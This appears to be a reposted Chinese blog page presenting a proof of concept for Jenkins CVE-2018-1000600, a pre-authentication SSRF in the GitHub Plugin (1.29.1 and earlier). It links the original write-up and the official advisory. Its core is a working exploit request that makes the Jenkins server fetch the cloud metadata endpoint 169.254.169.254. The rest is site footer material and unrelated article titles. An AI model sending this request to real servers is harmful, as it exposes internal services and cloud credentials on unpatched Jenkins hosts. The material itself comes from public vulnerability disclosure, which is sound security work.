当前位置: 首页 > news >正文

Jenkins CVE-2018-1000600漏洞利用与SSRF攻击分析

Jenkins - CVE-2018-1000600 PoC

来源博客文章
https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html

漏洞链利用
通过与CVE-2018-1000600链式结合,实现预认证完全响应SSRF攻击。
官方安全公告:https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915

影响范围
该漏洞影响默认安装的GitHub插件,具体版本为GitHub Plugin 1.29.1及以下

PoC代码

http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
?apiUrl=http://169.254.169.254/%23
&login=orange
&password=tsai

标签
devops, jenkins, Pentesting
发布时间
2019年3月5日下午2:01
作者
CG
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
公众号二维码

http://www.rkmt.cn/news/6947.html

相关文章:

  • 详细介绍:Python:OpenCV 教程——从传统视觉到深度学习:YOLOv8 与 OpenCV DNN 模块协同实现工业缺陷检测
  • 深入解析:PYcharm——pyqt音乐播放器
  • 专题:Python实现贝叶斯线性回归与MCMC采样数据可视化分析2实例|附代码数据
  • CF 2127F Hamed and AghaBalaSar
  • “Sequential Thinking MCP Server 和codex等AI工具本身任务拆解功能对比
  • 题解:P2624 [HNOI2008] 明明的烦恼
  • XXL-JOB (1)
  • 记录---Vue3对接UE,通过MQTT完成通讯
  • 单例模式
  • apache修改默认位置
  • 实用指南:YOLOv11的旋转目标检测改进-(扩展检测头支持旋转框预测,适配遥感场景)
  • 从零到顶会:NLP科研实战手册 - 实践
  • 肝不好能喝酒吗
  • ROS中如何将日志格式设置为行号的形式
  • 深入解析:RxJava在Android中的应用
  • 002_文本分类任务的问答
  • 文件包含漏洞
  • 谁在我这位置遗留或丢失了一颗口罩爆珠(好像是桃子味)?
  • 负载均衡层详解part3-lvs
  • 4. MySQL 索引优化实战
  • python小计划——学生管理系统
  • 经典SQL语句大全
  • IvorySQL 与 deepin 完成兼容性认证,共创开源生态新篇章
  • 在 Nginx 上搭建静态站点
  • DIFY 项目中通过 Makefile 调用 Dockerfile 并采用 sudo make build-web 命令构建 web 镜像的方法和注意事项
  • Qt函数方法传入参数未使用-警告warning错误error提示解决
  • mysql 性能监控,关键指标解析与优化案例剖析
  • 百家大型企业共同选择:2025年人力资源管理系统权威推荐榜单
  • Rhinoceros 8.23.25251.13001 犀牛3D建模
  • 三台ubuntu22相互免密登录最快